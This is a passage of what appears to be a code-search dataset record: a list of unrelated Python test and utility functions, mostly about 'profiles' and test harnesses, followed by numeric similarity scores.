[FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"]]\n logger._log_to_console_and_log_file(\"Testing using MISSING information and with special chars\")\n for test in LIST_OF_TESTS:\n # Fill \"Server hardware\" if needed.\n if test[0] == FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE:\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_DROPDOWN)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_SERVER_HARDWARE_UNASSIGNED)\n ui_lib.wait_for_element_and_input_text(FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_NAME, \"Name\")\n if test[0] is not None:\n ui_lib.wait_for_element_and_input_text(test[0], test[1])\n ui_lib.wait_for_element_and_click(test[0])\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_BTN_CREATE_SERVER_PROFILE)\n if not correctly_executed(ui_lib.wait_for_element_visible, test[2], test[3]):\n status = False\n if not status:\n ui_lib.fail_test(\"At least one error message was not displayed\")", "def 
test_create_payment_profile(self):\n self.cim.create_payment_profile(\n customer_profile_id=u'300',\n customer_type=u'individual',\n card_number=u'42222222222',\n expiration_date=u'2009-10'\n )", "def test_init(self):\n self.assertTrue(self.profile.bio == \"very awesome\")", "def test_components_profile(self):\r\n\t\tprofile = Profile.objects.get(bio=\"I'm a female profile with inserted components\")\r\n\t\tself.assertEqual(self.u1.profile, profile)", "def test_profile_state(self, country, state, expected):\n with mute_signals(post_save):\n profile = ExamProfileFactory(\n profile__country=country,\n profile__state_or_territory=state\n )\n assert CDDWriter.profile_state(profile) == expected", "def extract_results_test(self):\n assert len(self.results.keys()) != 0\n TESTS = [\n {\n \"input\": {\"molecules\": [\"DDSPDLPK\"], \"score_threshold\": 0.95},\n \"output\": {\n \"formula\": \"C(37)H(59)N(9)O(16)\",\n \"file_name\": \"BSA1.mzML\",\n \"scaling_factor\": 100,\n \"spec_id\": 1337,\n },\n }\n ]\n for test_dict in TESTS:\n for key, n, entry in self.results.extract_results(**test_dict[\"input\"]):\n print(key, entry)\n assert key.formula == test_dict[\"output\"][\"formula\"]\n assert key.file_name == test_dict[\"output\"][\"file_name\"]\n assert entry.scaling_factor == test_dict[\"output\"][\"scaling_factor\"]\n assert entry.spec_id == test_dict[\"output\"][\"spec_id\"]\n # print(self.results)\n # print(self.results.lookup)\n assert n == 0", "async def test_retrieve_one(self):\n expected = {\n '_id': 'id',\n 'name': 'name',\n 'version': 4,\n 'status': 'active'\n }\n rsps = respx.get(f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id') \\\n .mock(return_value=Response(200, json=expected))\n profile = await provisioning_client.get_provisioning_profile('id')\n assert rsps.calls[0].request.url == \\\n f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id'\n assert rsps.calls[0].request.headers['auth-token'] == 'header.payload.sign'\n assert profile == expected", "def test_T01():", "def test_output_set_output_flag_for_property_where_array(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n where = np.full_like(profile_from_dataset.get_property_data(\"PRES\"), False, dtype=bool)\n where[0] = True\n where[-1] = True\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", ArgoQcFlag.PROBABLY_GOOD, where=where)\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags[0] == ArgoQcFlag.PROBABLY_GOOD.value)\n assert np.all(flags[1:-1] == ArgoQcFlag.GOOD.value)\n assert np.all(flags[-1] == ArgoQcFlag.PROBABLY_GOOD.value)", "def createMakingTest(tx, query, personId, testId, date, hour, result):\n tx.run(query, personId=personId, testId=testId, date=date, hour=hour, result=result)", "def should_profile():\n if util.dev_server:\n return _config.should_profile_development()\n else:\n return _config.should_profile_production()", "def test_get_result_histogram(self):\n pass", "def test(self, test_no):\n returncode, out = self.run(test_no)\n out = str.strip(out) if out else None\n\n if self._output[test_no][0] == returncode:\n print(\"RETURN CODE CORRECT\")\n else:\n print(\n \"ERROR: EXPECTED return {}, ACTUAL return {}.\".format(\n self._output[test_no][0], returncode), file=sys.stderr)\n\n if not out and len(self._output[test_no]) > 1:\n print(\"ERROR: No output from student app.\", file=sys.stderr)\n return\n sys.exit(1)\n\n 
if len(self._output[test_no]) == 1 or self._output[test_no] == 2:\n # bad input size or negative decimal value\n return\n sys.exit(0)\n\n if self._output[test_no][1] == out:\n print(\"OUTPUT CORRECT\")\n else:\n print(\"ERROR: EXPECTED {}, ACTUAL {}\".format(\n self._output[test_no][1], out, file=sys.stderr))", "def Run_Profile(init,traits,Env,sig = 0.0001,Ntot0 = 10,tmax = 100,T=TS,dt = 0.01,mu=0.005):\n\n\t## Environmental conditions\n\tHinf = Env[0]\n\tCinf = Env[1]\n\tNinf = Env[2]\n\tGinf = Env[3]\n\tQH = Env[4]\n\tQC = Env[5]\n\tQN = Env[6]\n\tQG = Env[7]\n \n\t## Traits \n\tthresh = traits[7]\n\tslope = traits[8]\n\tgmax = traits[9]\n\tVc = traits[1]\n\tQc = traits[2]\n\n\t## Calculation of constants over timescale of interest (here, the temperature is constant)\n\tDeltaG0catT = DeltaG0(T,deltaG0Cat,deltaH0Cat)\n\tDeltaG0anaT = DeltaG0(T,deltaG0Ana,deltaH0Ana)\n \n\t## Initialization\n\tHT = []\n\tCT = []\n\tNT = []\n\tGT = []\n\tXoT = []\n\tNCT = []\n\tXT = []\n\tD = []\n\ttime = []\n\tNPPT = []\n\tt=1\n\n\tHT.append(init[0])\n\tCT.append(init[1])\n\tNT.append(init[2])\n\tGT.append(init[3])\n\tXoT.append(init[4])\n\tNCT.append(init[5])\n\tXT.append(init[6])\n\tD.append(0)\n\ttime.append(0)\n\tt=1\n \n\twhile time[t-1] < tmax: \n\t\tH = HT[t-1]\n\t\tC = CT[t-1]\n\t\tN = NT[t-1]\n\t\tG = GT[t-1]\n\t\tXo = XoT[t-1]\n\t\tNC = NCT[t-1]\n\t\tX0 = XT[t-1]\n\n\t\tnNCT,nXT,qana,qcat,decay,mort,dt = Step_Profile(NC,X0,traits,[H,C,N,G],gamma,T,dt)\n\t\tNCT.append(nNCT)\n\t\tXT.append(nXT)\n\t\tD.append(decay+mort)\n\t\tnS = Step_Substrates([H,C,N,G],Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],qana,qcat,dt,Vc)\n\t\tHT.append(nS[0])\n\t\tCT.append(nS[1])\n\t\tNT.append(nS[2])\n\t\tGT.append(nS[3])\n\t\tNPPT.append(qana*NC)\n\n\t\tnXo = Step_DeadBiomass(Xo,Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],decay,mort,Qc,XT[t-1],dt,Vc)\n\t\tXoT.append(nXo)\n\t\ttime.append(time[t-1] + dt)\n\t\tt=t+1 \n#\t\tprint(time[t-1])\n\treturn(NCT,XT,HT,CT,NT,GT,XoT,D,time,NPPT)", "def TestSample(self, index=None, params=None):\t\t\n\t\tif index == None:\n\t\t\tindex = random.randint(1,self.nTest)\n\t\ts = ReadAIFF(self.dataDir+'test'+('%i'%index)+'.aiff')\n\t\tP, freqs, bins = mlab.specgram(s, **params)\n\t\treturn P, freqs, bins", "def print_results(results, random_counterpart=None, random_concepts=None, num_random_exp=100,\n min_p_val=0.05):\n\n # helper function, returns if this is a random concept\n def is_random_concept(concept):\n if random_counterpart:\n return random_counterpart == concept\n\n elif random_concepts:\n return concept in random_concepts\n\n else:\n return 'random500_' in concept\n\n # print class, it will be the same for all\n print(\"Class =\", results[0]['target_class'])\n\n # prepare data\n # dict with keys of concepts containing dict with bottlenecks\n result_summary = {}\n\n # random\n random_i_ups = {}\n\n for result in results:\n if result['cav_concept'] not in result_summary:\n result_summary[result['cav_concept']] = {}\n\n if result['bottleneck'] not in result_summary[result['cav_concept']]:\n result_summary[result['cav_concept']][result['bottleneck']] = []\n\n result_summary[result['cav_concept']][result['bottleneck']].append(result)\n\n # store random\n if is_random_concept(result['cav_concept']):\n if result['bottleneck'] not in random_i_ups:\n random_i_ups[result['bottleneck']] = []\n\n random_i_ups[result['bottleneck']].append(result['i_up'])\n\n # print concepts and classes with indentation\n for concept in result_summary:\n\n # if not random\n if not is_random_concept(concept):\n 
print(\" \", \"Concept =\", concept)\n\n for bottleneck in result_summary[concept]:\n i_ups = [item['i_up'] for item in result_summary[concept][bottleneck]]\n\n # Calculate statistical significance\n _, p_val = ttest_ind(random_i_ups[bottleneck], i_ups)\n\n print(3 * \" \", \"Bottleneck =\", (\"%s. TCAV Score = %.2f (+- %.2f), \"\n \"random was %.2f (+- %.2f). p-val = %.3f (%s)\") % (\n bottleneck, np.mean(i_ups), np.std(i_ups),\n np.mean(random_i_ups[bottleneck]),\n np.std(random_i_ups[bottleneck]), p_val,\n \"not significant\" if p_val > min_p_val else \"significant\"))", "def test_get_result_histogram_stat(self):\n pass", "def test_get_risk_profile_all_using_get(self):\n pass", "def test_components_profile_gender(self):\r\n\t\tself.assertEqual(self.u1.profile.gender, 'female')", "def test_is_instance(self):\n self.assertTrue(isinstance(self.profile, Profile))", "def test_remove_spawning_profile_from_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) != 0:\n assert True\n\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n assert True\n break\n\n tester.delete_spawning_profile_from_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) == 0:\n assert True", "def filterprofile(profile, settings):\n \n if settings.exclude is True and len(profile.description) == 0:\n print(\"EMPTY BIO\")\n return False\n\n if profile.description is None:\n return False\n\n if len(settings.include_keywords) > 1 and not any(kw in profile.description for kw in settings.include_keywords.splitlines()):\n print(\"NO KEYWORDS\")\n return False\n\n if profile.followers_count is None:\n return False\n \n if profile.followers_count < settings.followers:\n print(\"NUM FOLLOWERS\")\n return False\n\n if any(loc in profile.location for loc in settings.fromcountries.splitlines()):\n print(\"LOCATION\")\n return False\n\n if profile.statuses_count < settings.tweets:\n print(\"NUM TWEETS\")\n return False\n\n created = datetime.datetime.strptime(profile.created_at, \"%a %b %d %H:%M:%S %z %Y\")\n months = relativedelta(datetime.datetime.now(datetime.timezone.utc), created).years * 12\n if months == 0:\n if (profile.statuses_count / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n else:\n if (profile.statuses_count / months / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n\n if profile.status is not None:\n lasttweetdate = datetime.datetime.strptime(profile.status.created_at, \"%a %b %d %H:%M:%S %z %Y\").replace(tzinfo=None)\n \n lasttweetmonths = relativedelta(datetime.datetime.now(), lasttweetdate).years * 12\n if lasttweetmonths > settings.notweetsfor:\n print(\"LAST TWEET\")\n return False\n else:\n return False\n # else\n return True", "def __call__(self, results):\n if np.random.rand() > self.prob:\n return results\n self._imequalize(results)\n return results", "def test_create_hyperflex_node_profile(self):\n pass", "def test(self):\n img_gen, self.loss_reg, self.parsav = self.net_G(self.input_P1, self.input_P2, self.input_BP1, self.input_BP2, self.input_SPL1, self.input_SPL2)\n ## test flow ##\n\n self.save_results(img_gen, data_name='vis')\n if self.opt.save_input or self.opt.phase == 'val':\n self.save_results(self.input_P1, data_name='ref')\n self.save_results(self.input_P2, data_name='gt')\n result = torch.cat([self.input_P1, img_gen, self.input_P2], 3)\n 
self.save_results(result, data_name='all')", "def checkProfileEquality(self, profile1, profile2):\n if len(profile1) != len(profile2) or len(profile1[0]) != len(profile2[0]):\n return False\n for gram1 in profile1:\n contains = False\n for gram2 in profile2:\n if gram1 == gram2:\n contains = True\n break\n if contains == False:\n return False\n return True", "def test_score():\n\n tpot_obj = TPOTClassifier()\n\n try:\n tpot_obj.score(testing_features, testing_classes)\n assert False # Should be unreachable\n except ValueError:\n pass", "def test_parcel_profile_saturated():\n levels = np.array([1000., 700., 500.]) * units.mbar\n true_prof = np.array([296.95, 284.381, 271.123]) * units.kelvin\n\n prof = parcel_profile(levels, 23.8 * units.degC, 23.8 * units.degC)\n assert_array_almost_equal(prof, true_prof, 2)", "def test(model,gen,n_id,threshold=0.5,verbose=True,print_every_n=10):\n t_start = time()\n ce_avg,tp,tn,fp,fn = 0.,0.,0.,0.,0.\n for i in range(n_id):\n X_test,y_test = gen.next()\n y_test = y_test.mean()\n Y_pred = model.predict(X_test)\n y_pred = Y_pred.max(axis=0)\n ce = np.mean(- y_test * np.log(y_pred) - (1-y_test) * np.log(1-y_pred))\n ce_avg += ce/n_id\n y_predr = y_pred.round()\n tp += sum((y_test == 1) & (y_predr == 1))\n tn += sum((y_test == 0) & (y_predr == 0))\n fp += sum((y_test == 0) & (y_predr == 1))\n fn += sum((y_test == 1) & (y_predr == 0))\n if i % print_every_n == 0:\n print(i)\n prec,recall,acc = tp/(tp+fp+1e-15),tp/(tp+fn+1e-15),(tp+tn)/n_id\n F1 = 2*tp/(2*tp+fp+fn)\n if verbose:\n print('Valid F1 %.3f tp %.3f tn %.3f fp %.3f fn %.3f' % (F1,tp,tn,fp,fn))\n print('Took %.1fs' % (time()-t_start))\n return(ce_avg,prec,recall,F1,acc,tp,tn,fp,fn)", "def test_generate_paulis(generators, num_qubits, result):\n pauli_ops = qml.paulix_ops(generators, num_qubits)\n for p1, p2 in zip(pauli_ops, result):\n assert p1.compare(p2)", "def profile_step(self):\n import profile\n\n profile.run(\"world.step()\")", "def test_T4():", "def test_T4():", "def test_profiler(self):\n\n a = np.arange(16, dtype=np.float32)\n b = np.arange(16, dtype=np.float32)\n p = profiler.Profile()\n try:\n p.enable()\n dot(a, b)\n p.disable()\n stats = pstats.Stats(p).strip_dirs()\n self.assertIn(('test_profiler.py', 7, 'dot'), stats.stats)\n finally:\n # make sure the profiler is deactivated when this test is done so as not to\n # pollute any other tests\n p.disable()\n del p", "def test_T2():", "def test_T2():", "def run_evaluation(self, example):\n assert isinstance(example, dict)\n assert 'name' in example\n\n name = example['name']\n house_id, camera_id = pbrs_utils.parse_house_and_camera_ids_from_string(name)\n\n gt_bg, gt_objects = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/gt*.ply'.format(house_id, camera_id))))\n gt_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/d*.ply'.format(house_id, camera_id))))\n print(gt_depths)\n assert len(gt_depths) == 5\n\n gt_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_overhead_mesh/{}/{}/overhead_fg.ply'.format(house_id, camera_id))))\n assert len(gt_overhead_fg) == 1\n gt_overhead_fg = gt_overhead_fg[0]\n assert path.exists(gt_overhead_fg)\n\n pred_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/pred_*.ply'.format(house_id, camera_id))))\n assert len(pred_depths) == 5\n\n pred_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/overhead_fg_clipped.ply'.format(house_id, camera_id))))\n assert 
len(pred_overhead_fg) == 1\n pred_overhead_fg = pred_overhead_fg[0]\n\n # pred_files_list = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/*.ply'.format(house_id, camera_id))))\n # pred_files = {path.basename(item).split('.')[0]: item for item in pred_files_list}\n # f3d_pred = path.join(config.default_out_root, 'factored3d_pred/{}/{}/codes_transformed_clipped.ply'.format(house_id, camera_id))\n\n # assert path.isfile(f3d_pred), f3d_pred\n\n # if 'overhead_fg_clipped' not in pred_files:\n # print('Overhead file is not available. Skipping for now. {}'.format(name))\n # return\n\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['overhead_fg']), [gt_objects], [pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0']), [gt_objects], [pred_files['pred_0']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['1']), [gt_objects], [pred_files['pred_1']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['2']), [gt_objects], [pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', 'overhead_fg']), [gt_objects], [pred_files['pred_0'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['1', 'overhead_fg']), [gt_objects], [pred_files['pred_1'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['2', 'overhead_fg']), [gt_objects], [pred_files['pred_2'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '2']), [gt_objects], [pred_files['pred_0'], pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['1', '2']), [gt_objects], [pred_files['pred_1'], pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', 'overhead_fg']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', 'overhead_fg', 'f3d']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['overhead_fg_clipped'], f3d_pred])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['f3d']), [gt_objects], [f3d_pred])\n\n # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['1', '2', '3']), [gt_objects], [gt_depths[1], gt_depths[2], gt_depths[3]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['2', '3']), [gt_objects], [gt_depths[2], gt_depths[3]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['3']), [gt_objects], [gt_depths[3]])\n\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0']), [gt_objects], [gt_depths[0]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['1']), [gt_objects], [gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['2']), [gt_objects], [gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['3']), [gt_objects], [gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['overhead_fg']), [gt_objects], [gt_overhead_fg])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1']), [gt_objects], [gt_depths[0], gt_depths[1]])\n 
self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2', '3']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2', '3', 'overhead_fg']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], gt_overhead_fg])\n\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0']), [gt_bg, gt_objects], [gt_depths[0]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['1']), [gt_bg, gt_objects], [gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['2']), [gt_bg, gt_objects], [gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['3']), [gt_bg, gt_objects], [gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4']), [gt_bg, gt_objects], [gt_depths[4]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['overhead_fg']), [gt_bg, gt_objects], [gt_overhead_fg])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4', '0']), [gt_bg, gt_objects], [gt_depths[4], gt_depths[0]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4', '0', '1']), [gt_bg, gt_objects], [gt_depths[4], gt_depths[0], gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4', '0', '1', '2']), [gt_bg, gt_objects], [gt_depths[4], gt_depths[0], gt_depths[1], gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3', '4']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], gt_depths[4]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3', '4', 'overhead_fg']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], gt_depths[4], gt_overhead_fg])\n\n # LDI\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '2', '4']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[2], gt_depths[4]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '2']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[2]])\n\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0']), [gt_objects], [pred_depths[0]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['1']), [gt_objects], [pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['2']), [gt_objects], [pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['3']), [gt_objects], [pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['overhead_fg']), [gt_objects], [pred_overhead_fg], force=True)\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', 'overhead_fg']), [gt_objects], [pred_depths[0], pred_overhead_fg])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1']), [gt_objects], [pred_depths[0], pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2']), [gt_objects], [pred_depths[0], pred_depths[1], pred_depths[2]])\n 
self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', '3']), [gt_objects], [pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', '3', 'overhead_fg']), [gt_objects], [pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3], pred_overhead_fg], force=True)\n\n self.run_if_not_exists(name, self.key('pred', 'both', ['0']), [gt_bg, gt_objects], [pred_depths[0]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['1']), [gt_bg, gt_objects], [pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['2']), [gt_bg, gt_objects], [pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['3']), [gt_bg, gt_objects], [pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4']), [gt_bg, gt_objects], [pred_depths[4]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['overhead_fg']), [gt_bg, gt_objects], [pred_overhead_fg], force=True)\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1', '2']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1], pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1', '2', '3']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1', '2', '3', 'overhead_fg']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3], pred_overhead_fg], force=True)\n\n # self.run_if_not_exists(name, self.key('pred', 'both', ['overhead_fg']), [gt_bg, gt_objects], [pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0']), [gt_bg, gt_objects], [pred_files['pred_0']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['1']), [gt_bg, gt_objects], [pred_files['pred_1']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['2']), [gt_bg, gt_objects], [pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['3']), [gt_bg, gt_objects], [pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '3']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '1', '3']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '1', '2', '3']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '1', '2', '3', 'overhead_fg']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['pred_3'], pred_files['overhead_fg_clipped']])\n #\n # # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['overhead_fg']), [gt_bg, gt_objects], [pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0']), [gt_bg, gt_objects], [gt_depths[0]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['1']), [gt_bg, gt_objects], [gt_depths[1]])\n # 
self.run_if_not_exists(name, self.key('gt_depth', 'both', ['2']), [gt_bg, gt_objects], [gt_depths[2]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['3']), [gt_bg, gt_objects], [gt_depths[3]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[3], ])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[3], ])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], ])\n # # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3', 'overhead_fg']), [gt_bg, gt_objects], [])\n #\n # # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['2', '3']), [gt_objects], [gt_depths[2], gt_depths[3]])\n # # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['1', '2', '3']), [gt_objects], [gt_depths[1], gt_depths[2], gt_depths[3]])\n # # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2', '3']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3]])\n #\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], ])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], ])" ]
[ "0.60760397", "0.59960103", "0.578803", "0.57689196", "0.56904364", "0.5670949", "0.5598614", "0.5586479", "0.55442274", "0.5540673", "0.5539732", "0.5532514", "0.5515403", "0.55088836", "0.54860824", "0.54771906", "0.54092103", "0.5376669", "0.53727055", "0.53688246", "0.5344023", "0.5321525", "0.53172666", "0.52896136", "0.52855694", "0.52560425", "0.52446467", "0.5241707", "0.5236878", "0.5236562", "0.52350724", "0.52340144", "0.52271205", "0.5221293", "0.52153987", "0.5207533", "0.5199755", "0.51859486", "0.51833725", "0.51478934", "0.5143337", "0.5130446", "0.51292586", "0.51284426", "0.5128408", "0.51243496", "0.5117261", "0.5115636", "0.5114109", "0.5094555", "0.50836825", "0.5076322", "0.5071944", "0.5068377", "0.50615937", "0.5056286", "0.5053309", "0.50503606", "0.5047189", "0.5047189", "0.50441885", "0.5041904", "0.50396496", "0.50381094", "0.50267595", "0.5006108", "0.50023586", "0.49947596", "0.49937245", "0.49928695", "0.4992793", "0.49894845", "0.4988107", "0.49827287", "0.49717438", "0.4967711", "0.49643826", "0.49614263", "0.495809", "0.49561414", 